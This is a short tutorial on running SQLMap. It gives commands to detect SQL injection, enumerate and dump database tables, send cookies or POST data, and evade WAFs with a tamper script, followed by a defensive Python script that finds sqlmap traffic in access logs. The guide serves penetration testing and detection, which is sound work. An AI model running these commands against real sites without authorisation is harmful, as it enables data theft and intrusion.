How to use SQLMap

SQLMap is an open-source penetration testing tool that automates detecting and exploiting SQL injection vulnerabilities in web applications, including extracting data from the underlying databases. Here’s a step-by-step guide to using SQLMap in Kali Linux.

Open a Terminal in Kali Linux.

Basic Command Structure:

  • Use sqlmap -u <URL> [options] where -u specifies the target URL.

Examples:

  • Detect SQL Injection: To check if a URL is vulnerable, use: sqlmap -u "http://example.com/page?id=1"
  • Enumerate Databases: If a vulnerability is detected, list databases with: sqlmap -u "http://example.com/page?id=1" --dbs
  • Enumerate Tables: List tables in a specific database: sqlmap -u "http://example.com/page?id=1" -D database_name --tables
  • Dump Data from a Table: Extract data from a table: sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump

Advanced Options:

  • Specifying a Cookie: For authenticated testing, provide a session cookie with: sqlmap -u "http://example.com/page?id=1" --cookie="PHPSESSID=abc123"
  • Specifying User-Agent: Customize the User-Agent string: sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0"
  • Using a POST Request: If parameters are sent via POST: sqlmap -u "http://example.com/login.php" --data="username=admin&password=password"
  • Evading WAFs/IDSs: Use tamper scripts to modify payloads, for example: sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
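
From the defender's side, the traffic these options produce can be looked for in web server access logs. The following is an added example, not part of the original guide or of SQLMap itself: it flags sqlmap's default User-Agent and the /**/-for-space pattern that space2comment generates. The log lines, IP addresses, version string and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format: ip - user [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# sqlmap's default User-Agent starts with "sqlmap/<version>" unless --user-agent overrides it.
DEFAULT_UA_RE = re.compile(r"^sqlmap/\d", re.IGNORECASE)
# space2comment replaces spaces with /**/, so SQL keywords end up glued to inline comments.
KEYWORDS = r"(?:select|union|and|or|from|where|order|by|sleep|case|when)"
COMMENT_SPACE_RE = re.compile(rf"\b{KEYWORDS}/\*\*/|/\*\*/{KEYWORDS}\b", re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges, made-up version string).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "GET /page?id=1%2F**%2FAND%2F**%2F1%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Mar/2024:10:00:09 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (client_ip, [indicator names]) for one access-log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None, []
    hits = []
    if DEFAULT_UA_RE.match(m["ua"]):
        hits.append("default-sqlmap-user-agent")
    # Decode twice so double URL encoding (%252F) does not hide the pattern.
    query = unquote_plus(unquote_plus(m["path"].partition("?")[2]))
    if COMMENT_SPACE_RE.search(query):
        hits.append("comment-as-whitespace")
    return m["ip"], hits

def scan(lines):
    """Map client IP -> sorted indicator names, for lines with at least one hit."""
    findings = {}
    for line in lines:
        ip, hits = classify(line)
        if hits:
            findings.setdefault(ip, set()).update(hits)
    return {ip: sorted(names) for ip, names in findings.items()}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A changed --user-agent removes the first indicator, so the query-string check is the more durable of the two. Parameters sent with --data travel in the POST body, which access logs do not record, so inspecting them needs request-body logging at a WAF or reverse proxy.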

Logging and Output: SQLMap saves logs and outputs in the .sqlmap/output/ directory. You can specify a different directory using the --output-dir option (-o is a different switch: it turns on SQLMap's optimization options).
